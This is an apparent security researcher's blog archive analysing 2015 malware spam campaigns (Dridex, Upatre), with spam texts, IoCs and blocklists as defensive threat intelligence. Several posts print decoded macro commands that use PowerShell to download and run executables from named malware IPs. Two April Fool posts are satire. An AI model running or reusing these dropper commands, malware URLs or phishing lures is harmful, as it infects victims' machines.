Sponsored by..

Thursday, 2 April 2015

Malware spam: "invoice@bankline.ulsterbank.ie" / "Outstanding invoice"

This fake banking email leads to malware.

From:    invoice@bankline.ulsterbank.ie [invoice@bankline.ulsterbank.ie]
Date:    2 April 2015 at 11:46
Subject:    Outstanding invoice

Dear [victim],


Please find the attached copy invoice which is showing as unpaid on our ledger.

To download your invoice please click here

I would be grateful if you could look into this matter and advise on an expected payment date .

Courtney Mason

Credit Control

Tel: 0845 300 2952 

The link in the email leads to a download location at hightail.com (the sample I saw downloaded from https://www.hightail.com/download/e?phi_action=app/directDownload&fl=SWhZekZucVhVbTlFQlFJWjA4bnVnVE9yZWt5UmdteDRsUjJuWENHRzVZbz0) which is a file called Doc_0062119-LQ.zip which in turn contains the malicious executable Doc_0062119-LQ.scr.

The executable has a VirusTotal detection rate of 3/57 and has characteristics that identify it as Upatre. Automated analysis tools [1] [2] [3] [4] [5] show that it downloads additional components from:

eduardohaiek.com/images/wicon1.png
edrzambrano.com.ve/images/wicon1.png

 It also POSTs data to 141.105.141.87 (Makiyivka Online Technologies Ltd, Ukraine) in a characteristic Upatre manner:

http://141.105.141.87:13840/0204uk11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK

According to the Malwr report, the downloader drops a file gkkjxyz22.exe which has a detection rate of 2/57. This is probably the Dyre banking trojan.

Recommended blocklist:
141.105.140.0/22
 eduardohaiek.com
edrzambrano.com

MD5s:
4c666564c1db6312b9f05b940c46fa9a
876900768e06c3df75714d471c192cc6

Wednesday, 1 April 2015

Malware spam: "Your Remittance Advice COMPANY NAME"

Yet another malware spam run today, this time from randomly-named but legitimate companies, for example:

From:    Kate Coffey
Date:    1 April 2015 at 15:00
Subject:    Your Remittance Advice PEEL SOUTH EAST

Dear sir or Madam,

Please find attached a remittance advice (JT934IYIP.doc) for your information.
Should you need any further information, please do not hesitate to contact us.

Best regards
PEEL SOUTH EAST

Attached is a Word document with a filename matching the body one in the text. Every email attachment we have seen so far is slightly different, but there seem to be just two different malicious macros [1] [2] [pastebin] which download a component from one of the following locations:

http://31.41.45.175/sqwere/casma.gif
http://91.242.163.78/sqwere/casma.gif


Those servers are almost certainly entirely malicious, with IPs assigned to:

31.41.45.175 (Relink Ltd, Russia)
91.242.163.78 (Sysmedia, Russia)

This file is saved as %TEMP%\DOWUIAAFQTA.exe and has a VirusTotal detection rate of 4/49. Automated analysis tools [1] [2] [3] show attempted connections to:

188.120.225.17 (TheFirst-RU, Russia)
45.55.154.235 (Digital Ocean, US)
188.126.72.179 (Portlane AB, Sweden)
1.164.114.195 (Data Communication Business Group, Taiwan)
46.19.143.151 (Private Layer Inc, Switzerland)
79.149.162.117 (Telefonica Moviles Espana, Spain)
5.135.28.104 (OVH / Simpace.com, UK)

According to this Malwr report it downloads the same Dridex DLL as seen in this spam run plus another variant of the downloader with a detection rate of 3/56.

Recommended blocklist:
188.120.225.17
45.55.154.235
188.126.72.179
1.164.114.195
46.19.143.151
79.149.162.117
5.135.28.104/29
31.41.45.175
91.242.163.78

MD5s:
b4be0bb41af791004ae3502c5531773b
7bede7cc84388fb7bfa2895dba183a20
564597fd05a31456350bac5e6c075fc9

Malware spam "Unpaid Invoice [09876] attached" / "This is your Remittance Advice [ID:12345]" with VBS-in-ZIP attachment

This rather terse spam has no body text and comes from random senders. It has a ZIP attachment which contains a malicious script.

Example subjects include:
Unpaid Invoice [09323] attached
Unpaid Invoice [86633] attached
Unpaid Invoice [35893] attached
This is your Remittance Advice [ID:42667]
This is your Remittance Advice [ID:69951]

Example senders:
SAROSSA PLC
32RED
NOIDA TOLL BRIDGE CO

Example attachment names:
RC422QNSB.zip
ML82034PMRY.zip
MK843NCAK.zip
OI8244LPNH.zip
ZW1760EHOG.zip
MANX FINANCIAL GROUP PLC
RARE EARTH MINERALS PLC

Inside is a malicious VBS script. It is likely that there are several different versions, the one working sample I saw looked like this [pastebin] which is very similar to the VBA macro used in this spam run yesterday.

When run (I don't recommend this!) it executes the following command:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile  -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.202/sqwere/casma.gif','%TEMP%\giuguiGIUGdsuf87t6F.cab'); expand %TEMP%\giuguiGIUGdsuf87t6F.cab %TEMP%\giuguiGIUGdsuf87t6F.exe; Start-Process %TEMP%\giuguiGIUGdsuf87t6F.exe;
Because there are probably several different versions of this script, there are probably several different download locations. In this case, a fake .GIF file is downloaded from a malware server at 193.26.217.202 (Servachok Ltd, Russia) which is actually an .EXE file, but it gets saved as a .CAB file. For no very good reason it is passed through EXPAND which does nothing but save it to %TEMP%\giuguiGIUGdsuf87t6F.exe.

This binary has a detection rate of 4/55. Automated analysis tools [1] [2] [3] [4] show that the malware attempts to phone home to:

188.120.225.17 (TheFirst-RU, Russia)
121.50.43.175 (Tsukaeru.net, Japan)
82.151.131.129 (DorukNet, Turkey)
92.63.88.83 (MWTV, Latvia)
95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
199.201.121.169 (Synaptica, Canada)
188.226.129.49 (Digital Ocean, Netherlands)
192.64.11.232 (Synaptica, Canada)
77.74.103.150 (iway AG GS, Switzerland)
1.164.114.195 (Data Communication Business Group, Taiwan)
5.135.28.104 (OVH / Simpace.com, UK)
46.19.143.151 (Private Layer Inc, Switzerland)

It also drops another variant of the same downloader, edg1.exe with a detection rate of 3/56 and a Dridex DLL with a detection rate of 9/56.

Recommended blocklist:
188.120.225.17
121.50.43.175
82.151.131.129
92.63.88.0/24
95.163.121.0/24
199.201.121.169
188.226.129.49
192.64.11.232
77.74.103.150
1.164.114.195
5.135.28.104/29
46.19.143.151

Malware spam: "Batchuser BATCHUSER [ecommsupport@cihgroup.com]" / "CIH Delivery Note 0051037484"

The CIH Group is the name behind the Euronics brand. They are not sending out this spam, instead it is a simple forgery with a malicious attachment.

From:    Batchuser BATCHUSER [ecommsupport@cihgroup.com]
Date:    31 March 2015 at 09:15
Subject:    CIH Delivery Note 0051037484

**********************************************************************
This email and the information it contains are private, may be confidential and are for the intended recipient only. If you received this email in error please notify the sender immediately, confirm that it has been deleted from your system and that all copies have been destroyed. You should not copy it for any purpose or disclose its contents to any other person.
Internet communications are not secure and therefore CIH does not accept legal responsibility for the contents of this message.
We use reasonable endeavours to virus scan all outgoing emails but no warranty is given that this email and any attachments are virus free. You should undertake your own virus checking. We reserve the right to monitor email communications through our networks.
Combined Independents (Holdings) Ltd is registered in England No 767658 and has its registered offices at
Euro House, Joule Road, Andover, SP10 3GD

**********************************************************************
Apart from the disclaimer there is no body text. If you do as the disclaimer says and run attached Word document (CIH Delivery Note 0051037484.doc) through an anti-virus product then it will appear to clean, but it actually contains this malicious macro [pastebin] which downloads a component from:

http://www.tschoetz.de/122/091.exe

This is saved as %TEMP%\stoiki86.exe. There are usually two or three different download locations, but they will all lead to the the same binary which in this case has a detection rate of 5/56.

Various automated analysis tools [1] [2] [3] [4] show traffic to the following IPs:

91.242.163.70 (OOO Sysmedia, Russia)
37.139.47.81 (Comfortel Ltd / Pirix, Russia)
72.167.62.27 (GoDaddy, US)
212.227.89.182 (1&1, Germany)
46.228.193.201 (Aqua Networks Ltd, Germany)
46.101.49.125 (Digital Ocean Inc, Netherlands)
198.245.70.182 (Deniz Toprak / B2 Net Solutions Inc, US)
95.211.184.249 (Leaseweb, Netherlands)

According to this Malwr report it also drops another version of the downloader [VT 4/57] and a malicious DLL which will almost definitely be Dridex [VT 2/57].

Recommended blocklist:
91.242.163.70
37.139.47.81
72.167.62.27
212.227.89.182
46.228.193.201
46.101.49.125
198.245.70.182
95.211.184.249

Malware spam: "Australia Post" / "Track Advice Notification: Consignment RYR58947332

This fake Australia Post email leads to malware hosted on Cubby.
From:    Australia Post [noreply@auspost.com.au]
Date:    31 March 2015 at 23:25
Subject:    Track Advice Notification: Consignment RYR5894733

Your parcel (1) has been dispatched with Australia Post.

The courier company was not able to deliver your parcel by your address.

Label is enclosed to the letter. Print a label and show it at your post office.

Label: RYR5894733

To view/download your label please click here or follow the link below :

https://eparceltrack.auspost.com.au/external/webui/aspx?LabelCode=label_5894733


**Please note that this is an automatically generated email - replies will not be answered. 
I have only seen one sample of this and the Cubby download page was showing quota exceed. However, the payload will be identical to the one found in this other Australian-themed spam running concurrently.

Malware spam: "Australian Taxation Office - Refund Notification"

This fake tax notification spam leads to malware hosted on Cubby.

From:    Australian Taxation Office [noreply@ato.gov.au]
Date:    1 April 2015 at 00:51
Subject:    Australian Taxation Office - Refund Notification

IMPORTANT NOTIFICATION

Australian Taxation Office - 31/03/2015

After the last calculation of your fiscal activity we have determined that you are eligible to receive a refund of 2307.15 AUD.

To view/download your tax notification please click here or follow the link below :
https://www.ato.gov.au/AZItems.aspx?id=3673&category=Tax+legislation+and+regulations&sorttype=azindexdisplay&Disp=True?NotificationCode=notification_0354003

Laurence Thayer, Tax Refund Department Australian Taxation Office
The names and the numbers change from email to email. Despite the displayed URL in the message, the link actually goes to cubbyusercontent.com (e.g. https://www.cubbyusercontent.com/pl/RYR5601763.zip/_33cdead4ebfe45179a32ee175b49c399) but these download locations don't last very long as there is a quota on each download.

In this case, the downloaded file is RYR5601763.zip which contains a malicious executable RYR5601763.scr which has a VirusTotal detection rate of 20/57.

Automated analysis tools [1] [2] [3] [4] [5] show that it downloads components from:

ebuyswap.co.uk/mandoc/muz3.rtf
eastmountinc.com/mandoc/muz3.rtf


It then attempts to phone home to:

141.105.141.87:13819/3103us13/HOME/41/7/4/

That IP is allocated to Makiyivka Online Technologies Ltd in Ukraine. In addition, it looks up the IP address of the computer at checkip.dyndns.org. Although this is benign, monitoring for it can be a good indicator of infection.

These URL requests are typical of the Upatre downloader.

According to the Malwr report  it drops another binary jydemnr66.exe with a detection rate of 11/55 plus a benign PDF file entitled "War by remote control" which acts as some sort of cover for the infection process.

Recommended blocklist:
141.105.140.0/22
ebuyswap.co.uk
eastmountinc.com 



"You've received a Telex" spam

Well, I guess if people are daft enough to think that somebody has emailed them a fax or voicemail message then this is the next logical step.
From: Telex Operator [telex@victimdomain]
To: victim@victimdomain
Subject: You have received a Telex!
Date: 1st April 2015

You have received a Telex transmission. Please be so kind as to open the attachment.
Attached is a file telex.zip which in turn contains a presumably malicious file telex.txt neither of which are detected by VirusTotal [1] [2] and the Malwr report is inconclusive.

Foolishly, one of our users opened the attachment and saw the following text strings:
00110 01101 00100 10101 11000 00111 00100 10000 10100 00110 01100 01111 00100 10000 10100 00011 10000 00100 00101 11000 11100 00001 11000 01100 00001 00100 10100 00011 00101 00100 00001 11100 00011 00110 10010 00001 01001 00100 10101 11000 00111 00100 00011 00100 01101 00011 11101 11011 01100 00100 11111 11110 11000 00110 01110 00001 11100 00011 00110 10010 00100 11000 01010 00100 10000 00001 10010 00001 11101 00100 10000 10100 00001 01100 00100 10101 11000 00111 00100 00011 01010 00001 00100 00011 00100 01101 11000 11000 10010 11011 11100 00100 11111 10100 00011 10110 10110 10101 00100 00011 10110 01010 00110 10010 00100 01101 11000 11000 10010 11011 00101 11111 00101 00100 01001 00011 10101 11011 11100
As soon as the user opened it, our own Telex machine started printing out little skull-and-crossbones characters. Now, I thought this was odd because I didn't think that the Telex machine actually had that character on.. and when I took out the daisywheel and looked closely then I couldn't find it (see image below).

Weird, huh? So, I don't know if this is a weird cross-platform cyber virus or some sort of digital incantation? I don't have much time to look now though because apparently somebody has emailed me a telegram.

(Yes, it is April Fool's day. Nobody tried to decrypt the message though!)



UK government to regulate online smut, launches PORN.GOV.UK

The government's War on Porn continues to gain pace, with an announcement today that they will make porn filtering mandatory (effectively banning pornography for consumers) and replace it with the government-controlled website PORN.GOV.UK (which is not yet operational).

Very closely modelled on the existing gov.uk site, porn.gov.uk will be available to people who sign up for a Government Gateway account.

At the end of the year, each subscriber will receive a statement of which pornography they viewed, and the costs for this will be added to their annual tax bill, either through PAYE or Self-Assessment.

The government did release a preview of the site (see the image below) which is refreshingly free of filth on the home page.

Visitors can either use the search box to find what they are after, or they can browse for approved pornographic material by category.

It's worth remembering that all material must meet the new British Standards for Pornography set up by the BSI as BS 6969. The BSI will shortly start advertising for Pornography Analysts on their careers page.

Although many sources may object to the perceived censorship, it is surely common sense that wholesome state-approved pornography will be better for everyone. Government sources say that the legislation should be passed before the election with an expected go-live date of 1st April 2016. 

Tuesday, 31 March 2015

Malware spam: "Debit Note [12345] information attached to this email"

This fake financial spam comes with a malicious attachment. There is no body text:
From:    Scot Dennis
Date:    31 March 2015 at 14:32
Subject:    Debit Note [09993] information attached to this email
The number in the brackets varies, and the attachment seems to be randomly named (for example. 42549959.doc). There are probably many, many variants of this but the sample I saw had this malicious macro [pastebin] that executed the following command:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.203/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
The executable downloaded is identical to the one used in this spam run also taking place today. The payload is the Dridex banking trojan.




Malware spam: "83433-Your Latest Documents from RS Components 659751716"

This very convincing looking email pretending to be from RS has a malicious attachment. Although the email looks genuine, it is a simple forgery. RS are not sending out this email, nor have their systems been compromised in any way.

---------------------------------------------------------------

From:    Earlene Carlson
Date:    31 March 2015 at 11:30
Subject:    83433-Your Latest Documents from RS Components 659751716

RS Online Helping you get your job done.
You've received this email as a customer of rswww.com.


Dear Customer,


Please find attached your latest document(s) from RS.


Account Number
Date
Invoice Number
Document Total
Document Type
49487999
31-Mar-2015
659751716
£1133.90  
Invoice



For all account queries please contact RS Customer Account Services.

Tel: 01536 752867
Fax: 01536 542205
Email: rpdf.billing@colt.net (subject box to read DOC eBilling)


If you have any technical problems retrieving your documents please contact Swiss Post Solutions Helpdesk on the following:

Tel: 0333 8727520
Email: customers@colt.net


Kind regards,

RS Customer Account Services.


This service is provided by Swiss Post Solutions on behalf of RS Components.
Helping you get
your job done


RS Components Ltd, Birchington Road, Weldon, Corby, Northants, NN17 9RS, UK.
Registered No. 1002091. http://rswww.com. RS Online Help: 01536 752867.

---------------------------------------------------------------

The reference numbers, names and email addresses vary, but all come with a malicious and apparently randomly-named attachment (e.g. G-A6298638294134271075684-1.doc).

There are probably several different variants of this, but I have seen just one working example of the attachment which contains this malicious macro [pastebin] which executes the following command:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.91.175.64/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
For some reason, the EXE is download from http://185.91.175.64/jsaxo8u/g39b2cx.exe with a CAB extension and then run through EXPAND which.. errr.. does nothing much. The file is saved as %TEMP%\4543543.exe, and it has a VirusTotal detection rate of 3/57.

Analysis is still pending, but the VirusTotal report does indicate the malware phone home to 188.120.225.17 (TheFirst-RU, Russia) which I strongly recommend blocking, check back for more updates later.

UPDATE:
Automated analysis [1] [2] [3] [4] show attempted connections to the following IPs:

188.120.225.17 (TheFirst-RU, Russia)
1.164.114.195 (Data Communication Business Group, Taiwan)
2.194.41.9 (Telecom Italia Mobile, Italy)
46.19.143.151 (Private Layer INC, Switzerland)
199.201.121.169 (Synaptica, Canada)

It also drops another version of the downloader binary called edg1.exe with a 2/57 detection rate plus a Dridex DLL with a detection rate of 1/57.

Recommended blocklist:
188.120.225.17
1.164.114.195
2.194.41.9
46.19.143.151
199.201.121.169

Malware spam: "Circor [DONOTREPLY_JDE@circor.com]" / "CIT Inv# 15013919 for PO# SP14384"

This fake invoice does not come from Circor, it a simple forgery and is largely a repeat of a spam circulating last month.

From:    Circor [DONOTREPLY_JDE@circor.com]
Date:    31 March 2015 at 10:32
Subject:    CIT Inv# 15013919 for PO# SP14384


Please do not respond to this email address.  For questions/inquires, please
contact our Accounts Receivable Department.


______________________________________________________________________
This email has been scanned by the MessageLabs outbound
Email Security System for CIRCOR International Inc.
For more information please visit http://www.symanteccloud.com
______________________________________________________________________

In the sample I have seen, there is an attachment FOPRT01.doc which has a VirusTotal detection rate of 5/57. It downloads a binary from:

http://www.malpertus.com/54/78.exe

This binary is the same as used in this attack and it has the same payload.

Malware spam: "FW: Passport copy" / "salim@humdsolicitors.co.uk"

This fake legal spam comes with a malicious attachment. It appears to be a forwarded message from a solicitors office, but it is just a simple forgery.
From:    salim@humdsolicitors.co.uk
Date:    30 March 2015 at 11:58
Subject:    FW: Passport copy

From: Raad Ali [mailto:raaduk@hotmail.com]
Sent: 26 March 2015 08:03
To: salim
Subject: Passport copy

Salam Salim,

Please find attached copy of the passport for my wife and daughter as requested. please note we need to complete on the purchase in 4 weeks from the agreed date.

  Salam

Raad Ali
The attachment is named passport.doc. It is exactly the same malicious payload as the one used in this spam run earlier today, and it drops the Dridex banking trojan on the victim's PC.

Malware spam: "Your PO: SP14619" / "Sam S. [sales@alicorp.com]"

This fake financial spam comes with a malicious attachment:

From:    Sam S. [sales@alicorp.com]
Date:    31 March 2015 at 07:45
Subject:    Your PO: SP14619

Your PO No: SP14619 for a total of $ 13,607.46
has been sent to New Era Contract Sales Inc. today.

A copy of the document is attached

Regards,
New Era Contract Sales Inc.'s Document Exchange Team
In the sample I have seen, the attachment is APIPO1.doc with a VirusTotal detection rate of 5/56, and it contains this malicious macro [pastebin] which downloads a component from:

http://xianshabuchang.com/54/78.exe

which is saved as %TEMP%\kkaddap7b.exe. This malicious executable has a detection rate of 3/56. Various analysis tools [1] [2] [3] show that it phones home to the following IPs:

91.230.60.219 (Docker Ltd / ArtVisio Ltd, Russia)
185.91.175.39 (Webstyle Group LLC / Rohoster / MnogoByte, Russia)
46.101.38.178 (Digital Ocean, Netherlands)
87.236.215.103 (OneGbits, Lithuania)
66.110.179.66 (Microtech Tel, US)
176.108.1.17 (Cadr-TV LLE TVRC, Ukraine)
202.44.54.5 (World Internetwork Corporation, Thailand)
128.199.203.165 (DigitalOcean Cloud, Singapore)

According to the Malwr report it drops another version of itself called edg1.exe [VT 2/56] and what appears to be a Dridex DLL [VT 3/56].

Recommended blocklist:
91.230.60.0/24
185.91.175.0/24
46.101.38.178
87.236.215.103
66.110.179.66
176.108.1.17
202.44.54.5
128.199.203.165

MD5s:
f5ecc500c2b74612e33c0522104fb999
716d1dc7285b017c2dbc146dbb2e319c
2cb0f18ba030c1ab0ed375e4ce9c0342
6218264a6677a37f7e98d8c8bd2c13e9

UPDATE:
A couple of reports from Payload Security [1] [2]  also give some insight into the malware, including an additional but well-known IP to block:

95.163.121.178 (Digital Networks CJSC aka DINETHOSTING, Russia)



Wednesday, 25 March 2015

Malware spam: "Invoice ID:12ab34" / "123"

This terse spam has a malicious attachment:
From:    Gerry Carpenter
Date:    25 March 2015 at 12:58
Subject:    Invoice ID:34bf33

123
There is an Excel attachment with the same semi-random reference number as the subject (in the sample I saw it was 34bf33.xls) which currently has zero detections. Unlike most recent document-based attacks, this does not contain a macro, but instead has an embedded OLE object that will run a VBscript if clicked, the spreadsheet itself is designed to get the victim to click-and-run that object.


Automated analysis doesn't show very much, but it does show the screenshots [1] [2]. I haven't been able to extract the VBscript in a neat enough format, but what did interest me is this novel obfuscation [pastebin] which actually just executes this:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile  -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.221/zxr/ssidin.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; Start-Process %TEMP%\JIOiodfhioIH.exe;
Despite all the mucking about with expanding a CAB file, the downloaded file is actually an EXE file all along so nothing is done to it. This file has a detection rate of 7/56, and the Payload Security report shows it communicating with the following IPs:

92.63.88.83 (MWTV, Latvia)
82.151.131.129 (DorukNet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)


The payload is most likely Dridex.

Recommended blocklist:
92.63.88.0/24
82.151.131.129
121.50.43.175


MD5s:
ce130212d67070459bb519d67c06a291
461689d449c7b5a905c8404d3a464088

Malware spam: "James Dudley [James.Dudley@hitec.co.uk]" / "Payment 1142"

This spam email is yet another forgery pretending to be from a wholly legitimate company. It is one of a series of emails spoofing Cambridgeshire firms, and it comes with a malicious attachment.

From:    James Dudley [James.Dudley@hitec.co.uk]
Date:    25 March 2015 at 09:38
Subject:    Payment 1142

Payment sheet attached.

James

T    01353 624023
F    01353 624043

Hitec Ltd
23 Regal Drive
Soham
Ely
Cambs
CB7 5BE


This message has been scanned for viruses and malicious content by Green Duck SpamLab 
I have only seen a single sample of this, with an attachment Payment 1142.doc which has a VirusTotal detection rate of 5/57. It contains this malicious macro [pastebin] which attempts to download a component from:

http://madasi.homepage.t-online.de/dbcfg/32.exe

..which is then saved as %TEMP%\sollken1.2.8.exe, this has a detection rate of 12/57. Automated analysis of this binary is pending, but is so far inconclusive.

Incidentally, the macro contains this snippet:

' (File name: AddNewSheet.bas)
' Author: SENOO, Ken
' LICENSE: CC0
' (Last update: 2015-03-10T18:38+09:00)


All that means is that this Ken Senoo created and freely licensed a Visual Basic module that the bad guys are using. It does not mean that they have anything at all to do with this malware attack.

MD5s:
8f79a24970d9e7063ffcedc9a8d23429
02cfa3e6fdb4301528e5152de76b2abf

UPDATE: this interesting new tool from Payload Security gives some insight as to what the malware does. In particular, it phones home to:

50.31.1.21 (Steadfast Networks, US)
87.236.215.103 (OneGbits, Lithuania)
2.6.14.246 (Orange S.A., France)
14.96.207.127 (Tata Indicom, India)
95.163.121.178 (Digital Networks aka DINETHOSTING, Russia)


Recommended blocklist:
50.31.1.21
87.236.215.103
2.6.14.246
14.96.207.127
95.163.121.0/24

Tuesday, 24 March 2015

Malware spam: "Notice to Appear" / "Notice to appear in Court #0000310657"

These two emails come with a malicious attachment:

From:    County Court [lester.hicks@whw0095.whservidor.com]
Date:    24 March 2015 at 16:45
Subject:    AERO, Notice to Appear

This is to inform you to appear in the Court on the March 31 for your case hearing.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

You can review complete details of the Court Notice in the attachment.

Yours faithfully,
Lester Hicks,
Court Secretary.


-------------

From:    District Court [cody.bowman@p3nw8sh177.shr.prod.phx3.secureserver.net]
Date:    24 March 2015 at 16:44
Subject:    AERO, Notice to appear in Court #0000310657

Dear Aero,

This is to inform you to appear in the Court on the March 28 for your case hearing.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: If you do not come, the case will be heard in your absence.

You can review complete details of the Court Notice in the attachment.

Sincerely,
Cody Bowman,
District Clerk.

In these two case the attachments were named Court_Notification_0000310657.zip and Notice_to_Appear_000283436.zip containing the malicious scripts Court_Notification_0000310657.doc.js [VirusTotal 7/57] [pastebin] [deobfuscated] and Notice_to_Appear_000283436.doc.js [VirusTotal 6/57] [pastebin] [deobfuscated] respectively.

These scripts attempt to download malicious code from the following sites:

pitfaa.nidhog.com
ilarf.net
gurutravel.co.nz
lawyermyowin.com
www.lead.com.co

Details in the download locations vary, but are in the format:

ilarf.net/document.php?rnd=1161&id=
gurutravel.co.nz/document.php?rnd=3022&id=

This leads to a randomly-named file with a GIF extension which is actually one of two malicious EXE files, with detection rates of 6/57 and 4/56. One of those produces a valid Malwr report, the other smaller EXE doesn't seem to do anything.

The executable that seems to do something POSTs to a Turkish server at 176.53.125.25 (Radore Veri Merkezi Hizmetleri A.S.). Various Malwr reports [1] [2] [3] [4] [5] [6] indicate badness on at least the following IPs:

176.53.125.20
176.53.125.21
176.53.125.22
176.53.125.23
176.53.125.24
176.53.125.25


I would suggest blocking at least those IPs, or perhaps 176.53.125.16/28 or if you don't mind blocking access to a few legitimate Turkish sites you could perhaps block 176.53.125.16/24.

I am not 100% certain of the payload, however some servers in that cluster have been fingered for serving the Trapwot fake anti-virus software.

MD5s:
2d65371ac458c7d11090aca73566e3d4
da63f87243a971edca7ecd214e6fdeb1
77d8670f80c3c1de81fb2a1bf05a84b5
d48ef4bb0549a67083017169169ef3ee


Malware spam: "Mary Watkins [mary@elydesigngroup.co.uk]" / "Invoice"

This spam email message does not come from Ely Design Group, but is in fact just a simple forgery. Ely Design Group's systems have not been compromised in any way. This email comes with a malicous attachment.

From:    Mary Watkins [mary@elydesigngroup.co.uk]
Date:    24 March 2015 at 07:23
Subject:    Invoice

Hi,

As promised!

--
Mary Watkins
Office Manager
Ely Design Group
Attached is a Word document named S22C-6e15031710060.doc which has a low detection rate of 2/57 which contains this malicious macro [pastebin] which then downloads a component from the following location:

http://dogordie.de/js/bin.exe

The file is saved as %TEMP%\PALmisc2.5.2.exe and has a VirusTotal detection rate of 6/57.

Automated analysis tools [1] [2] [3] [4] [5] indicate that the binary crashes in those test environments. although whether or not it will work on a live PC is another matter. The payload (if it works) is almost definitely the Dridex banking trojan.

Friday, 20 March 2015

Something evil on 85.143.216.102 and 94.242.205.101

I will confess that I don't have much information on what this apparent exploit kit is or how it works, but there seems to be something evil on 94.242.205.101 (root SA, Luxembourg) [VT report] being reached via 85.143.216.102 (AirISP, Russia) [VT report].

Whatever it is, it is using subdomains from hijacked GoDaddy accounts [1] [2] which is a clear sign of badness. The hijacked GoDaddy domains change very quickly, but these have all been used in the past day or so on both those IPs:

dchsleep.com
manymike.com
vladeasa.com
ezdockparts.com
suurtampere.com
visikreatif.com
josemiguelez.com
reformapenal.com
axwaydropzone.com
capitolskopje.com
theantennapub.com
faceofsustengo.com
niagarajournal.com
crystalbeachhill.com
ezdockadirondacks.com
ezdockfingerlakes.com
chambel.info
lidifaria.info
ewwebinars.co
cybercoaching.co
ewwebinars.com
eyouthcounseling.com
ecounselingnation.com
epastoralcounseling.com
extraordinaryfamilies.com
drtim.net
drclinton.net
ewomencast.net
ecounseling.net
drtimclinton.net
ecouplecounseling.net
biblicalcoachingtoday.net
drclinton.org

For practical purposes though I recommend you block traffic to the IPs rather than the domains.

Recommended blocklist:
85.143.216.102
94.242.205.101

UPDATE:
These following nearby IPs have also been distributing badness. I recommend you block these too:
85.143.216.103
94.242.205.98

Thursday, 19 March 2015

Malware spam: "Invoice ID:987654321 in attachment." from random senders

This spam has no body text and a randomly-generated sender name and invoice ID number. Sample subjects include:

Invoice ID:07dda8035 in attachment.
Invoice ID:09bf252 in attachment.
Invoice ID:108df399 in attachment.
Invoice ID:11847972 in attachment.
Invoice ID:156a35519 in attachment.
Invoice ID:16bb539 in attachment.
Invoice ID:16de0833 in attachment.
Invoice ID:17ff9887 in attachment.
Invoice ID:19b5b30 in attachment.

Sample senders:

Angelia Oliver
Annette Hunter
Austin Bennett
Belinda Cameron
Brittney Dixon
Buster Nolan
Candace Bowers
Christian Kemp
Clarissa Gentry
Cruz Mcintosh
Doug Haney
Dylan Poole
Erwin Hale
Gordon Downs
Hallie Neal
Oscar Bradshaw
Reyna Carver
Rosalie Acevedo
Sid Alston
Sophia Scott
Tanner Puckett
Tia Kline
Trudy Hensley
Valerie Delaney
Ivy Stokes
Jeanie Frye
Karin Frank
Kayla Travis
Mai Rowland
Marilyn Fleming
Minerva Glover

The Word document contains an embedded OLE object that leads to a malicious VBA macro. The payload is exactly the same as the one used in this attack.


Malware spam: "Aspiring Solicitors Debt Collection" has mystery XML attachment

This spam has a malicious attachment.

Date:    19 March 2015 at 12:52
Subject:    Aspiring Solicitors Debt Collection

Aspiring Solicitors

Ref : 195404544
Date : 02.10.2014
Dear Sir, Madam
Re: Our Client Bank of Scotland PLC
Account Number:77666612
Balance:       2,345.00
We are instructed by Bank of Scotland PLC in relation to the above matter.

You are required to pay the balance of GBP 2,345.00 in full within 7(seven) days from the date of this email to avoid Country Court proceedings being issued against you. Once proceedings have been issued, you will be liable for court fees and solicitors costs detailed below.

Court Fees  GBP 245.00

Solicitors Costs  GBP 750.00

Cheques or Postal Orders should be  made payable to Bank of Scotland PLC and sent to the address in attachment below quoting the above account number.
We are instructed by our Client that they can accept payment by either Debit or Credit Card.If you wish to make a payment in this wa, then please contact us with your Card details. We will then pass these details on to our Client in order that they may process your agreed payment. Kindly note that any payment made will be shown on your Bank and/or Credit Card Statement as being made to Bank of Scotland PLC
If you have any queries regarding this matter or have a genuine reason for non payment, you should contact us within 7 days from the date of this email to avoid legal proceedings being issued against you, by filling the contact us form in attachment below.

Yours faithfully,
Shawn Ballard
Aspiring Solicitors

Department CCD, Box 449
Upper Ground Floor
1-5 Queens Road Quadrant
Brighton
BN1 3XJ
United Kingdom
Attached is a file with a random numerical name (e.g. 802186031.doc) which is in fact a malicious XML file that appears to drop the Dridex banking trojan. Indication are that this can run even with macros disabled. Each attachment has a unique MD5.

Analysis is currently pending, this appears to have several new techniques to avoid detection. According to this Twitter conversation one version attempts to download a binary from 91.226.93.51/smoozy/shake.exe although this is currently timing out for me. For security analysts, a sample of the XML file can be found here.

IMPORTANT: if you have opened this document in Word then there is a good chance that you are infected. I would recommend that you shut down any machine that has opened this. Anti-virus detections are currently very poor, but vendors may have signature available soon, I would wait 24 hours before attempting to disinfect any infected machine. Dridex collects banking passwords, so it is important that machines are not used for financial transactions.

UPDATE:

This particular attack uses some novel features. Opening the Word document reveals what appears to be an embedded XLS file:

There's some interesting metadata.. created by "Dredex" of "Ph0enix Team", then modified by "ПРроываААА".


In the typical attack scenario, opening the embedded file will force the macro to run. In this case, I used LibreOffice on a Linux box which does not support VBA. This revealed the malicious code, which looks like this.

A bit of copy-and-pasting reveals nothing more sophisticated than some Base 64 encoded text that attempts to run one of the following commands:
